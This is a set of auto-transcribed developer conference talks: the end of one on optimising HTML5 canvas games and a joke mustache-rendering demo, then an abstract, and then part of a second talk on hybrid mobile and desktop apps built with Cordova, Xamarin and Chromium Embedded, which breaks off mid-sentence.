the rendering below the plasticine because typically it's the sun or the moon that's shining down and creating that shadow. So we thought we could eliminate sort of half or more of the plasticine but it turned out that based on the angle and the manipulation of that plasticine it was pretty challenging. But we did gain some insight from that and the insight was that we really only needed to focus on the upper half of the plasticine. So from that we kind of came up with this idea well what if we kind of took the other approach which is we obscured the bottom half. We thought we can do that by just placing sort of another object that was like half the same shape on top of the bottom portion of the plasticine and then kind of fade out the edges. So this actually looked pretty good. So this is where we got with that and you can see it's we're getting a lot closer with that one. We ran into some issues with rendering this one and then also it just the motion still didn't quite feel right on this one. And that but it did again kind of lead us to what we ended up doing ultimately and you know that looks really different than it did in the game. That's funny. But basically what we ended up doing is stroking the edges of each of those shapes with a gradient. And the thing that made this work is in the same way that the shader kind of took advantage of what the GPU can do. We were sort of taking advantage of the native functionality of what you can do in a canvas which is apply a gradient. Right. The canvas probably instructs the GPU but the canvas knows how to render gradient so it knows how to do that math to sort of go from one color to another and by kind of stacking these on top of each other we could get something really close to the effect that ultimately he wanted. And it's funny because on the monitor it doesn't quite look right but. Oh does it really? That's funny. Yeah that's right. Anyway the game looked really really good. And Max I'll be honest Max was kind of only begrudgingly said that this was okay. This was after like you know serious effort trying to find something that would work. That guy is hardcore and we have a ton of respect for him because of it. But in the end we took this approach and the great thing about this is because we were doing something that canvas knew how to do quickly we actually I don't know with this and some other optimizations that we made we actually ended up with a version of the game that was faster and also had was closer to the effect that ultimately they wanted in the game. And so and this is so this was an example of where we kind of needed to step outside of the code that had already been written and look at the problem and try to find like a novel solution to that. And that is the perfect segue into the last thing that we want to talk about of course which is Tom Selleck. So we imagine a world and I think Tom Selleck is sort of the best way to think about this where we we could all have the the the benefit of Tom Selleck's mustache. In fact we found somebody else who celebrates this goal with us and we wanted to share this quick video with you as an introduction to what's coming. This is where you can stand up and dance on your seat. So I hope you guys feel it because we feel it. In fact we feel it so much that we created a JavaScript library to help us see the end goal here which is called StashKit. So StashKit web based facial hair delivered as a service. This is the world premiere of the service available soon. Why? Obviously because we want to be first to market. Nobody else that we know of is doing this. Industry knowledge both Joel and I have at some point grown facial hair and most importantly for this talk it turned out that this is an awesome performance test bed. So some of the things that we want to share with you about performance can be really well illustrated through facial hair. Okay let's see it. Here we go. So we'll just orient you quickly to the product. We've got a photo of a handsome gentleman there and he's got an amazing mustache. Of course that is not his mustache. That is rendered with StashKit technology. There's a number of options. So if you wanted to apply the mount man growth formula you could grow the mustache. Or if you're just happy with the instant week we can go back to that. We recognize that there are a number of popular color choices. So if you want a red mustache or if you've got a fair complexion you've got that black. Brown's pretty nice. You could change the curl of the Stash. So maybe wavy, little extra curl there. And of course you've got lots of different choices. So maybe we'll go with this guy. That's kind of fun. We'll shrink it down. That looks pretty good right? Looks amazing. That lucky man. So briefly I'll give you a quick overview of as to how this is working. So we have sort of the templates you can see along the bottom which define the Stash as we call it in code. It's just more fun to call everything a Stash. And so in the actual images we apply a little bit of opacity towards the bottom of the mustache. We load that image into a canvas and parse out the individual pixels. Based on the opacity of the particular pixel we give it a probability that determines the density of the mustache. You obviously wouldn't want a mustache where it's completely dense. You want to be able to control the density. And so that opacity fade gives us a little bit of confidence so that the mustache sort of fades and gives you a natural look. Now of course our favorite feature is the aroma. And maybe I should... Yeah you want to see this one. Let's increase this guy so you can see it in the right place. So it's hard to visually represent an aroma, right? So we put our head against the wall and this is what we came up with. So this was the big challenge. How do we render this mustache at 60 frames a second? You can see right here this is not 60 frames a second. I'll do it again so you can see because you... I'll isolate it. Let's put it over here. You can see... Oh, let's put it up here. Here we'll put it right there. There we go. So you can see that there's a little bit of stutter in between those frames. It's not completely smooth. And basically what's happening is when we parse out that pixel data, depending on the mustache, there are quite a few hairs in there. So I think one of the bigger ones that we looked in it was I think around 15,000 hairs. And so what we're telling the canvas to do for each of those pixels is to take the beginning point, take the length of the mustache, take the inflection point where the curl is, calculate the curl strength using a curve, and then stroke that line. Repeat 15,000 times. And you have to do that every frame, every 16 milliseconds. It's pretty challenging to do even with the hardware acceleration that the canvas provides because of there are so many calls consecutively. So let's switch back. Let's see if I can do it this time. There we go. What just happened? So I kind of gave you an overview of what happened and how the basics of the framework work. When we did the initial implementation of this, we got around 10 stashes per second. We'd like that to become a new sort of benchmark in JavaScript performance. So if you could take that back and start profiling your code in stashes per second, that would be great. Clearly not good enough for a mustache rendering service. So the first thing we tried to do was we thought maybe we can render the mustaches by color group. So if you saw the mustaches, you noticed that they're not all one color because that's not going to look natural. It would just look like one big mass. So there's a little bit of variation. So we had, I think, between five and six colors for each complexion. And we would vary those based on just sort of randomly distribute them through the stash. So we thought maybe we can speed up. Instead of doing 15,000 strokes, maybe we can do all the colors and stroke them all at once. Canvas has a great API where you can draw a line, move, draw another line, and then stroke it all at once. And in a lot of the games that we've done and projects in the past, we found really good performance benefits by using that technique where rather than doing individual operations on the canvas, you group as many together as possible and then do them all at once. So sort of the four different colors right here, you take the first implementation that we did where they're interspersed. You'd have different colors. We decided to sort the array so that we would have all the colors sort of in one group. We could stroke them all. We thought this is going to be fantastic. And the performance was great. We got great performance out of this. But the problem is you can see the stash on the left has sort of got that natural look to it. We didn't realize that by grouping them by color, we're basically saying all the colors are going to be sort of on top of each other in layers because it doesn't look right at all. It actually doesn't look that bad here, but if you had darker colors on top, it just doesn't look right. So we thought, well, that was a good try. Clearly not going to cut it. So then we thought, let's cache the stash. So the approach here, and it's one that we've used on a number of games, is when you have a sequence of frames that need to get rendered but will be reused, you can actually draw that to an off-screen canvas and extract the image from the canvas and sort of create your own little mini sprite where you have the frames for each image that are rendered, and then you replay that. So in this case, we also had a growing mustache animation. So you can see up at the upper left, it's sort of barely starting to come in. And then each frame, it gets a little longer, a little longer, and you have the full stash. And with this technique, we were able to get the 60 frames per second, which Robbie calls a stash stash. It is stash stash. There's no other way to say it. That's also a benchmark when you hit 60 SPS at stash stash. So let's switch back to the app. So this is, I'll show you the, we've got our mustache here. So this is the render by color. We'll show you that. So you can see the, a mustache does not look great. So we've kind of got all the colors. Let's try a different color. Some of them, it really does not look great because they're grouped together sort of all in one layer. Switch back to this guy. So let's turn on the pre-render. The challenge with the pre-render, and you sort of have to find the right time to use it, is that even though it's going to give you that 60 frames a second, it does take a little bit of time to pre-render all those frames, and then you catch those results. So we'll click the aroma. You'll see that it basically does nothing for a few seconds while it's caching the result. And then you can see the smooth stash-tastic animation. And silky. Just like you want it. So you can see that that is much, much smoother than the original implementation. And it's because we're basically just replaying that series of frames that we've already rendered. We thought, go ahead. We thought we'd have a little bit of fun with the webcam API. So we added that feature in. Let's see if we can do it. Any volunteers? Should we make Robbie do it? I'll do it. There you go. All right. So that's a lot of stash for me. I'm not complaining. I think the lighting might be... We do have an enhanced too to help with the lighting. Let me turn that on. Oh, there we go. Oh, yeah. That's way better. There we go. Robbie looks amazing. I think we can all agree. So this is coming for all of you. So keep an eye out for StashKit. You can stay tuned on thinkpixelab.com. We really will deploy this. We've actually been working on this for on and off for like two years. We've been having fun. We felt like maybe we could do eyebrows. There's one sort of Yosemite Sam thing that looks like it could be a toupee. Although David Hasselhoff definitely does not need that. But it doesn't hurt. Yeah. All right. All right. So yeah, with that we have six days BS and we have perfect rendering as you can imagine. So, you know, I think the things we talked about today in terms of performance are probably things that you sort of understand. But if you took one thing away today, it would be to write great code that you can understand that other people can understand and then optimize 3% of it. And then when you're optimizing that 3%, this is our approach. We look at the hotspots using the best tools. IE has, we showed you the IE performance tools because that was a project for Internet Explorer. Chrome and Firefox also have great DevTools. All of them I think have a great profiler now. A lot of times you will find that the performance just won't get better by refining your code. So that's when you get to think creatively. You think about the approach that you're taking or there are other ways that you can accomplish the same thing. And then last is an invitation to experiment and refine because this is where you learn and it's also where you typically tend to solve the hardest problems. And I think that is it. So yeah, we hope you guys have enjoyed the talk. If you have feedback, we'd love to hear that. If you have questions, we're open for those as well. Oh, there's a question. All right. Let's take it. Go ahead. In fact, Contrudeur's shading thing, I understand it wasn't an option because it brought us support, but did you play with WebGL at all? It wasn't an option, so we didn't play with it. Today I think we would. This was about two years ago and there was just not a lot of great WebGL support at the time. Now there is. Also, there's a project with Microsoft and IE, Internet Explorer in particular did not support WebGL at the time, so it would have been awkward for them had we shipped a game with WebGL. But that really is the right thing to do for sure. And that's how we would do it today. Definitely. That's a great question. Yeah. Performance is usually quite critical in games. How did you find moving from doing normal software across into playing with it? So I forgot we're supposed to repeat the question. So the question was performance is obviously a critical part of writing games. How did we find the process of going from sort of typical maybe line of business software to creating games and maybe what are the different kind of performance constraints that you deal with there? Do you want to take that one? Yeah, at least for me, I came from a server background where I was working on server code and there actually is a big performance focus there because you have to handle so many concurrent users. So for me it was sort of a natural, I've always loved performance. I think the challenge is sort of what we talked about is not getting overly enthusiastic about performance and really letting the profiler guide that process of optimization. I think it's so easy as developers we get excited about maybe an article that we read that says like this little JavaScript tip led to huge performance gains and really knowing when to use that. In most cases it's probably not necessary and it will over complicate the code. And so I think as a developer over my career it's more of learning when the right time to optimize is and really using the tools to let that guide the choice and where to optimize. That's great. Yeah. When you are rendering out what you're seeing onto the campus, is your render loop basically just loads and loads of manual calls to go every little bit just in terms of primitive like rectangle and stuff? Are there any libraries for working with campus that you recommend to use? Do you want me to take that? Sure, you can start. Yeah. So the question was when you're working with Canvas, so for those of you who aren't familiar with it, Canvas is basically just a surface onto which you can draw whatever you want. You have like open season with pixels onto Canvas in HTML5. And the question was is there a library that we like to use or are we using the native Canvas API? We've done kind of through several libraries. So there's one by Grant Skinner that, what is that one called? EZL.js, which we use for a couple of early projects which we liked. Recently we've been using a kind of a gaming framework called Phaser.io, if you guys are familiar with that. And that one actually has WebGL support for both 2D and 3D if it's available. It's really cool. We're actually really happy with that one. With Cut the Rope where we were doing, and also with ContraJour we were doing a port. And so because we really needed to be stay in sync with the code that that developer had already written, it wasn't as easy or didn't make as much sense to use another framework. So both of those are, we're just rendering directly with the Canvas API. Yeah, and in terms of primitives versus, I think it's sort of a mix. In games there are a lot of sprite based animations, so a lot of it is drawing images. And then there's some primitives, whether it's polygons or lines or things like that. I think you had a question. When talking the physics engine from Objective C to JavaScript, did you have to change anything in the algorithm? Is there any mass computation that's inherently impossible or very hard to do in JavaScript? It's a great question. Yeah. So the question was, were we able to take the Objective C physics engine and use that directly in JavaScript or did we have to modify any of the algorithms? We tried not to modify any of the algorithms. We tried to focus on sort of low level optimization just because we were afraid if we changed the algorithm that it would change the results. And we wanted the game to feel identical to iOS. But we had to do a lot of optimization. So those early code examples where we talked about removing vector allocations, removing arrays, being really careful about calling functions inside tight loops where the physics engine was operating, those are sort of the areas that we had to focus on. So we didn't change the algorithms, but we had to do a lot of performance work to get it to run at high speed. Go ahead. Are there any good tips on, you know, you spoke about benchmarking, but you really can benchmark this. Some canvas operations are a lot slower than others. And all the Chrome or whatever profile will tell you is time spent on canvas, but maybe you could make it faster by having it a pack and not semi-transparent or things like that. Are there any good ways to profile in that area? Yeah, that's a great question. So the question is, are there any good ways to sort of narrow down the areas when you're drawing to be more specific and find the hotspots? And I think for us it was a little bit of trial and error and a little bit of reading. There's lots of good resources on the web that talk about tips for performance. We went through a lot of those and some of those panned out for us. Some of them didn't, depending on the platform. One in particular I can remember was that there was a recommendation to use multiple canvases and sort of stack them on top of each other. We had a hard time getting the performance out of that. It may have changed now. Another sort of interesting thing is that because the browser engines are improving so quickly that it really is a moving target, like one technique that works today may not work tomorrow. And so it is better if you can find sort of the approach-based methods or algorithmic approaches where they're always able to do better. And I think for us it was just more of a process of trial and error combined with sort of some guided points to start. Yeah, that's exactly. Any other questions? Well, we've had a lot of fun, so thank you guys. Appreciate it. Thank you.
|
For far too long the web has gone without a fast, reliable framework to render fake mustaches. The handlebar, mutton chop, and soul patch will guide us in our journey to optimize canvas and JavaScript performance. We’ll discuss our pragmatic approach to performance optimization and walk through real world challenges we solved while developing HTML5 games like Cut the Rope and Contre Jour.
|
10.5446/50813 (DOI)
|
Hello. Good morning. It's working. Thanks very much for coming this morning. I wasn't expecting quite such a big crowd after the party last night, so I'll try and make this worth your while for getting up and coming through. I've never spoken to NDC, so I'll just introduce myself. I'm Kevin. I'm a software developer with RedGit in Cambridge. We have a booth out in the Expo Hall, so come and say hello to us. We're not at all scary. If you have any questions, throughout the talk, feel free to throw up your hand. Otherwise, grab me afterwards or else I'm on Twitter, so tweet me and I'll get back to you. Why are we here this morning? I want to show you what's been happening in hybrid apps, which is something, of course, just a due expectation setting. Who knows what hybrid apps are? Just show of hands. Most people, just as a quick refresher, hybrid apps allow you to write most of your app using web technologies and web standards, and then some of your app using a native platform, but it feels like a native app. It started on mobile and now spans both mobile and desktop, so I'll cover both. I have a slightly secondary goal of trying to encourage you to use them, because I think it's a very nice technology. I have the caveat that anyone that tells you technology acts is the perfect solution and will fix all of your problems. They're either lying wrong or both, so I think hybrid apps are really nice for certain use cases when used appropriately. Before hybrid apps, your options were to write things using a native toolkit. On both mobile and desktop, this is what people have been doing. On iOS, you write Objective C or Swift now, I guess, and on desktop, you would just use whatever Coco or WPF. For an architecture point of view, this looks like the vendors provide some sort of device with an SDK like compilers and UI libraries. Then on top of that, you'll write your business logic, either on iOS that would be Swift, on Android you'd be using Java, Windows Phone you'd be using C sharp probably. Then you'd define a separate UI for each of these, so using interface builder on Mac for iOS, using Android XML if you want to declare the UI declaratively on Android or on Windows Phone. Building things and then the little cloud icon shows that pretty much every app on mobile and certainly a line of business, they're all backed by some web service, so your app doesn't stand alone, it's backed by something. Building things natively has a lot of advantages. I've grouped a few of them together just saying you're using the supported tool chain. This has some knock-on consequences around you're basically using the tool set that the vendor used to actually write the OS and write the first party apps, so things like debuggers, profilers, documentation, sort of activity on stack, which is how we all program, all that stuff's there for you. This tends to be quite good either because you're writing quite close like native machine code or so you get compiled to native machine code or else because you're using the APIs that the vendor used, they're all heavily optimized paths. You get the look and feel of the vendor apps just through the fact that you're using their control tools and you just get a lot of that for free. One that people often don't think about but is useful is the fact that the vendor is now control distribution for a lot of us, so on mobile certainly through the app stores and also now on Mac and Windows, there's a move towards app store distribution through the Mac app store and through the Windows store. If you use all the native tools, do exactly as the vendor tells you, you have a better chance of getting submitted and getting through there without having your app go through cycles of rejection. Why don't we all just do native stuff that would seem like the best solution. It has lots of disadvantages. The obvious one is duplicated code. You're writing that up X times for the X different platforms that you're targeting. It's slightly worse than that however because you're also writing that code in different languages so there's no common language across all these platforms and it gets even worse again because there's different platforms that you're having to write that code on. If you're targeting iOS, you're going to have to get a Mac. You're going to have to use X codes, different environments, targeting Windows phone, you're writing in C sharp and you're in Visual Studio and that context switching can be relatively expensive for small dev teams. All of this, even if you pay that penalty up front and do all that work, it's an ongoing pain because it's having maintenance costs. If you want to add a feature and even a small feature or a small bug fix, you have to do it X times. You can't really do a talk in hybrid without covering Xamarin. Has everyone heard of Xamarin and know what they are? That's surprisingly small number. I thought this audience would know more. Xamarin is a really, really nice technology and it allows you to target Android and iOS using C sharp. You just have a common language across all the platforms but you're still building native apps. If we look at what that looks like, you still have iOS and Android and Windows phone, the base OS with all of the SDKs. Xamarin then provides an abstraction layer on top of that called Xamarin.ios and Xamarin.android. That is very thin and marshals from nice C sharp types and C sharp idioms through to, in the case of iOS, through to the objective C native APIs and in the case of Android through to the Android SDK. It's basically all the P info calls but it's very nice. On Windows phone, you obviously Microsoft have C sharp as a first class citizen. Using this to the chain, you get full C sharp coverage and it's still native. The idea is that on top of that, you write a common C sharp business layer. That goes 100% shared. That's the thing that's calling out to your rest services or doing some computation, doing validation, all that sort of stuff. For the best UX, to really make it feel like a first party app, you still need to build separate UIs. You still need to use interface builder, use XML and Android or else build some XAML. With the latest version Xamarin, it's actually quite interesting. They've released Xamarin forms which would merge those top three boxes. It's not a perfect solution because although it's native controls and will feel fast, the UI paradigms are different enough across the platforms that to truly feel like an app that was made by Apple, you'll still need to build separate UIs. Xamarin, really nice solution. You really get all the same advantages as native. It's the way the tool chain works. It compiles it through the model compiler, produces MSIL, which gets compiled, so you produce actual machine code. The code execute and device, there's no difference if you went through the first party compiler or the Xamarin stuff. You have fewer languages to learn. For the majority of your app, you're still writing in C sharp, which is really nice. You have fewer environments for big chunks of your code, so you can use Xamarin Studio or mono develop across all platforms or you can stay in Visual Studio. The big one is that you get to reuse your existing skills. Over the last 14 years, we've all been building up lots of C sharp expertise, so now we get to reuse that and target the mobile platforms. It's not a perfect solution. Everything's got disadvantages. For Xamarin, there's still some duplicated code with all of the problems that that has. It depends on the nature of your app, how much duplicated code you've got. If you're doing pretty much everything in C sharp, then obviously you've got really good code sharing. I think Hanselman and his talk on Wednesday gave some really good examples where games can get 95% code sharing because they're doing all the drawing and stuff themselves. If your app is just something that calls out to some cloud service to get JSON and then render it on screen and have some forms, then a big chunk of your app can actually be that UI layer. So if you want to build separate UI experiences for each of them, then you still have a lot of duplicated code. Just because we're C sharp devs doesn't mean we're mobile devs, so you'll still need to learn how to work with all the different platforms to make apps that feel like they belong on the platform. And then the big one, I guess, depends on what you care. I quite like Xamarin and I trust them not to screw me, but it is a proprietary tool, Jane. So you're now for your core app, putting someone between you and the actual device vendor and that's closed source. So all the things with vendor lock-in, like they could increase prices or remove platforms, that kind of stuff, or they could lag behind native if iOS 10 gets released with some new feature that you want to use, all that sort of stuff. I think it's not so important because Xamarin is a good company. So that brings us to why we're actually here this morning, which is hybrid apps. So hybrid apps, they came out of mobile and there was really, at the start, there was no clear winner in which device type was going to win and that's still true. So we have to at least, as developers, target iOS and Android and increasingly we have to target Windows phone as well. So people looked for commonality across the devices to see what's actually there on each of them and really the best common denominator is the web browser. So you can create an app that gets a web view on the screen. So it's an app that they install through the app store and that kind of thing, but it uses web to actually render all the content. So there's a bunch of companies that do this. They all have their merits, pros and cons, but the biggest one, the one that's got the most market share and the most traction is Cordova or PhoneGap. So I'll probably use those interchangeably. For those of you that don't know, it's reasonably complicated, but PhoneGap is basically the trademarked name of the open source Cordova project. Cordova, you almost certainly have apps built using Cordova on your phone. There's a few really big ones like Untapped, which is a sort of like four square for beer, so you get to drink beer and then check in to say, I drank this delicious beer and you should all drink it. Well, I haven't been using that much in Norway because as nice as your country is, your beer is really, really expensive. But these stats are from PhoneGap.eu last year, but the Untapped creator was on stage speaking about his experiences. And he now, at that stage, and his growth curve was crazy, but at that stage he had over a million users that were checking in about 45 million beers a month, and none of those users care that was built using PhoneGap. They just care that it's a really nice app that lets them sort of share their passion with people. Another good example of a PhoneGap app that you may have used is 2048, which is that very addictive game where you move the numbers around to double things up and then pull your hair out when it doesn't work. But that was built using PhoneGap, and in both cases, they could reuse other existing web skills to get something on mobile that users love. Microsoft have also released first party support now for Cordova, so in Visual Studio, there's a CTP out where you can just sort of go file a new project and get a Cordova app up and running with emulators and debuggers and all the sort of stuff that you want. So this is what Cordova and most of the hybrid apps have looked like from an architecture point of view so far. So the device layer, again, uses the iOS Android, Windows Phone, and Cordova supports every other platform that you could possibly imagine. There's a native piece of code which takes all of the native features of the device, so all of the hardware and all of the API surface, and projects that through a consistent JavaScript API, and the aim with Cordova is that the JavaScript API will be web standards where possible, and they basically act like a polyfill, so anywhere there's not a web standard to do what you want to do with the device, they'll create one and try and encourage the browser vendors to standardize it. And then against that consistent JavaScript API, you can write all of your app in JavaScript and all of your UI and HTML. The problem with this is that you may have noticed I've called this the heavy Objective C app and heavy Java app, and that's really because Cordova traditionally has been essentially a single big native app that projects out all of the API surface of the native devices, and that leads to a very large code base, reasonably long compile times and reasonably long startup times. So in the last year, so Cordova's moved away from this architecture to something that's really nice and Cordova now is basically a plugin framework. The native code doesn't really do anything anymore apart from provide mechanism to load plugins, and those plugins can do things that Cordova has traditionally done like GPS or storage or NFC or whatever, and each of those plugins feeds into this consistent JavaScript API, which you can still use to build your app. So the plugins are all maintained by the Cordova project for doing the core things that you'd expect, but what I want to show this morning is sort of how easy it is to take something and add it into this plugin space. So this could be something like something that only your phone does, like Siri or something that isn't part of sort of a standard yet, or it could be existing native code that you have to do like crazy CPU bound image manipulation or something. So that will be the first demo. Let's see if it works. I'm going against all wisdom here and doing some live coding. Let's see how it goes. So I'm going to make a directory for this NDC demo. And Cordova have distributed a handy command line tool called Cordova CLI, which you can install, which sort of works like real scaffolding. If you've used that to really just build projects really fast. So I can just do Cordova create NDC demo 123, and then you have to give it an ID. So this follows the sort of Java style IDs. And that will create my project. That won't work. So if we take a look at what that's actually created, you can see that I have my double-dub-dub folder, which is the actual apps, the JavaScript and HTML that make it up. I have plugins where there is none yet. So this won't be able to access any native features that aren't part of the web spec. And then platforms. So this is the actual native code that runs on the device. So as you can see, I don't have any yet. So let's jump back to Cordova CLI and add a platform. I'm going to add Windows Phone 8, just because it's easy to demo on this machine. But you can add Android or iOS or whatever else you want to use in this same way. And then if we jump back to platforms, you can see the Windows Phone 8 folder has been created. And in there, there's all the sort of CS Proj and SLN files that you'd expect. So let's jump over to Visual Studio and open that guy up. And it just follows the same file structure of the double-dub-dub from my actual app. The addition is this Cordova lib. So this is the sort of skeleton thing that gets the actual app up on screen and opens a UI view and loads your assets into that web view and that kind of stuff. So if we run this guy, then over in my emulator, come back. He's there. Let's close the emulator. Start it again. So this is compiling the code embedding those assets, the actual web assets as resources. And then it will deploy to my emulator. Not having an emulator sort of makes these demos not work. Yeah. How do you do that? Oh, it's right there. Ah, well spotted. Yeah, I would never work that out. So here's my app loaded in the emulator. And you can see this green pulsing bar just sort of says this app is ready to go. So it doesn't really think particularly interesting at the moment. So let's add a plugin that would sort of expose something that isn't part of the web spec yet, but that my Windows phone can do. So the thing that I've chosen to demo is speech. So I have something up on GitHub here, just a skeleton plugin just to see if creating that boilerplate, which if we take a look at it has native sources for Android and Windows phone. So that's the actual native code that's going to do to begin with text speech. So give it a string and speaks it aloud. And then the dub, dub, dub, you've got speech.js. So you'll notice that although I had two native platforms, I want to get one JavaScript. And that's sort of the aim is that you can add platforms in, but your consistent JavaScript API doesn't change across platforms. So if I go back, copy this to the clipboard. Where's this guy? So that's the Cordova plugins add give it that get repo and it will do the clone for me. Add things to the right place. And then when I jump back to Visual Studio, you'll see it's noticed that the SLM file has been updated and the project has been updated. So let's go reload. And now we've got some additional things added. So we've got this plugins added, which is the native code. So if we look at that, you'll see it inherits from this base command, which is just the way you define plugins for Windows phone and C sharp and then Java on Android has similar idioms, which uses a speech synthesizer thing. So that's not available in web, but we've made it available. And then when our uploads in the web view, there's now a JavaScript file called speech.js. And all it defines is a single JavaScript function, which takes some texts, some success and error callbacks. And then all it does is call this Cordova exec function, pass the long success error, a string, which is the class that I want you to go and look up in my native code, the method in that class. So speak. And I would like you to pass along to this array of arguments. So text in this case. Because this is Windows phone and the security model requires that all the apps define what they need, we have to switch on some capabilities. So I'm going to switch on microfunctions. I'm going to use that in a second and switch on speech recognition, because that's the thing that actually does text the speech. So that just sort of says to the OS that I'm about to use it. And then over in my app, this on device ready handler gets called whenever Cordova has started and sort of says all the native stuff's been initialized and you can start doing device things. I can just do speech.speak. Norway is awesome. Let's see if this works. I don't know. Norway is awesome. Yay, it worked. So that's a plugin that I had prebuilt. But I want to show you how easy it is to extend this to add some new native functionality that I want to expose. So let's say I wanted to do speech recognition. I'm definitely not widely deployed part of the web standard yet. So let's sort of start from the outside in. So if I was writing, if when this becomes part of the web standard and gets widely deployed, it'd be really nice if there was a function like speech.recognize. I wanted to just recognize some text so it doesn't get any orgs, because I just wanted to recognize whatever it hears. But I would like it to call me back with whatever it heard. And then you can imagine if this was like a conference app or something, you could sort of filter by speaker based on what name had been spoken. But for the purposes of this demo, let's just alert it to the screen. Okay, so that's what my app built. That's what I'd like it to do. The JavaScript plugin that's going to shim across the native code, it needs to find a separate function. So that recognize function. And you'll see how little has to change here. So I define function. It doesn't take orgs anymore, because all it takes is a success and error call back. I still want to use that same class, that same speech class that we defined in C sharp. But now instead of using the speak method, look for this recognize method. And I'm not going to pass along any orgs, because there's nothing to this method. And then over in C sharp, let's just define this method. So all methods that go across the bridge from the web view into C sharp, all follow the same signature, which is void name string of options. And this string is a string of JSON. So you can use JSON.net to deserialize or else could over provide this JSON helper. So we're not actually taking any arguments. So we don't need that. So I just happened to know that there's a thing called speech recognizer UI, which has some settings. And one of those is show confirmation. So we don't need this because we're going to alert to the screen. But you could use this. You can sort of see that you get the full API. So you can do all the sort of language detection and stuff. I can use that recognizer to recognize with some UI. This is async. So if I did this properly, I'd use await and do it all nice. But just for now, give me the task. And on that task, continue with a function which will use the task which has a result which has a recognition results. So again, this is terrible. And you wouldn't do this in reality. You do proper handling stuff that recognition result has the actual task, sorry, the actual text that has been spoken. So this is my spoken text. So now this call, this recognized method will get called. It'll return almost instantly because it's async. And some time later, my continuation will get called to say that I have finished and I have hopefully detected some text. So now I want to pass that result back to the web view. I want to call that success handler that we defined in JavaScript. So Cordova makes this really trivial. You have a dispatch command result. I am a plugin, so I will give you a plugin result. I won't do any error handling because this will definitely work. So I'll just say that everything was okay. And the only arguments to that success callback are, sorry, spoken text. Okay, so that should be it. Let's see if it works. So I press play to deploy it. My app starts. Norway is awesome. It does the speak bit from earlier because this is the first time this app's ever, in fact, this phone has ever used speech recognition. This sort of saying is everything okay. So that's it is. Will this detect my accent or should I have spoken like an American? Pretty close. So you can see that it's pretty easy to take native functionality and expose it. So that's things like on iOS you could have used Siri here. On Windows Phone 8.1 you could have used Cortana, which does much better recognition. But the idea is that in five or ten lines of code you can really quickly build up an app that exposes out some native stuff. This could even be something that's in your business, some existing C sharp code that you want to expose. Where did the PowerPoint go? Okay. And the idea is that over time these plugins will become less and less. You will just be able to deprecate some of the native plugins as they become part of the web standard. This has already happened for things like file system where you used to have to have a plugin, a polyfill that sort of gave you access to the file system. But now most of the mobile web browsers support that. So I've been working on hybrid apps on mobile for a while and I really like the workflow. I think that's a very productive way to work, great way to share code. But I work at Redgate and we don't actually build up many mobile apps and we're still mostly on desktop actually. So what I want to say is I could take the workflow advantages that you get on hybrid and mobile and bring it to the desktop. And when I first started looking around, the best way to do this seemed to be to use the built in IE web browser control. But that's really scary because you don't know on the end user machine what version of IE they're going to have installed. You don't want to leave something like that up to chance. It'll break on the machine and they'll be very unhappy. So it'd be really nice if you could distribute just the control, not a browser, but a browser control which is modern, standards compliant and really good. So when I looked around, I found Chromium embedded. So Chromium embedded or Ceph is essentially the C sharp core of the Chrome web browser. It's repackaged as an app and then it's distributed along with your stuff. So it's repackaged as a library so you can distribute it along with your app. And then it's got some very nice features for allowing you to host it in your C sharp app like your WPF app or your Cocoa app or whatever platform it is you're using and interact with it. So you can still write pretty much all of your C sharp, all of your app in C sharp and then just write the UI layer in HTML. When I first suggested using this in the office, all of the other devs said no, you should find someone else that uses it to make sure this is stable and something we want to take a bet on. So I looked around and it's almost certain that you will have this installed in your machine and not even realize it or at least I was surprised to find that was the case. So the biggest app that I can find that uses it is Spotify. So Spotify is a C++ app, C or C++ app, but the entire UI is built using HTML. So on Mac, on Windows, they share the same UI, all they do is the C++ app boots, gets web control onto the screen as fast as possible using Chrome embedded and then displays these embedded assets. Valve use it on Steam, so if any of you here are gamers, you probably get Steam installed and there are UI, both a lot of the in-game UI for the Steam UI and all of the Steam game picker stuff. It's all HTML5 using C++. And then one that I find really surprising is Dropbox. So Dropbox uses this as well. I don't really think of Dropbox as having much UI, it just sits in my system tray and keeps all my files in sync, but this little system tray control is built using C++ as well. And there's a bunch of others. This thing is getting attraction now, so Adam, the new editor from GitHub uses it and Bracket, the new editor from Adobe uses it, so it's getting more and more popular. So we built a few prototypes, but one of the problems that we had was that from Redgate, people expect, we built the audience for Visual Studio and SQL Server Management Studio and people expect fairly deep integration into the IDE, so we wanted to know could we do that using JavaScript and HTML. So we built SQL Scripts, which is a snippet sharing thing in SSMS, and you can see here it looks quite nice. So it allows you to, when you're coding some SQL, select a chunk of it, sort of share with community, and it can set it to a big repository that's searchable and everyone can use it. And the feedback on this has been really good. So you might be thinking that, certainly some of the guys in the Office.dot, this looks quite nice, but I could do this using WPF, it's just a nice sort of theme. So I have one very quick demo that shows some of the advantages of, some of the advantages of this way of working that may not be obvious from first glance. So here's SQL Server Management Studio, here's SQL Scripts integrated in the IDE. So this is using all the SSMS extensibility APIs, so it's C-sharp language we're familiar with, but it's about to start a Chrome control. If I hold down this Shift key as it starts, then not only does the app start, and hopefully work good, but I also get an instance of the Chrome DevTools. And so now I can interact with my app as if it were a web page, which it essentially is. So I can do something like find this all scripts element, and then update that to all awesome SQL scripts. And that just updates. So what we found is that just the rate of development and the rate of iteration, especially when you're working with designers, we have a bunch of designers in the company, and working with them before was painful because they would sort of come over as you'd written those as Ammo, look at it go, now that's Rubberstatt's developer artwork, tell you what to do, stand over your shoulder as you recompile, restart the SSMS, and now they can just do it all themselves. So they can come in here, fix it up, you can write that back to disk as HTML, and you just sort of shorten those feedback cycles. So Google have noticed this sort of trend, and now have got their own platform called Google Chrome Packaged Apps. So these are hybrid apps on the desktop. This is a screenshot of Pokesman, which some of you may have used if you do Web Dev. It's a really good tool for exploring REST APIs, but, how about overtime? It allows you to explore Web APIs, make JSON calls, see what they look like, and this is something that would have before been a desktop app almost certainly, but now it's a Chrome Packaged App, it's all built using HTML5 and JavaScript, and then distributed through the Chrome App Store. So as you can probably tell, I'm a pretty big fan of hybrid apps, I think it's a nice way to build things, and it's got some nice advantages. The most obvious is code sharing, so the ability to sort of just write code once, have it run across lots of different platforms, sort of the dream. In addition, you get transferable skills, so when you write on iOS using JavaScript, it's not a big jump to writing on Android using JavaScript or Windows Phone. A subtle one, but important, is the pace of change in Web development. The Web platform is the biggest platform by far, and the number of companies investing in tooling, debugging, profiling, all of that stuff is massively fast moving on the Web, and you get to inherit that all for free across both mobile and desktop. And then one that sort of works for me at least is the idea that you're building future skills. So the Web has been quite a disruptive technology on desktop. If you look at things like Google Docs and Office Online, a few years ago, they would have definitely been exclusively desktop products, but now the Web provides a lot of 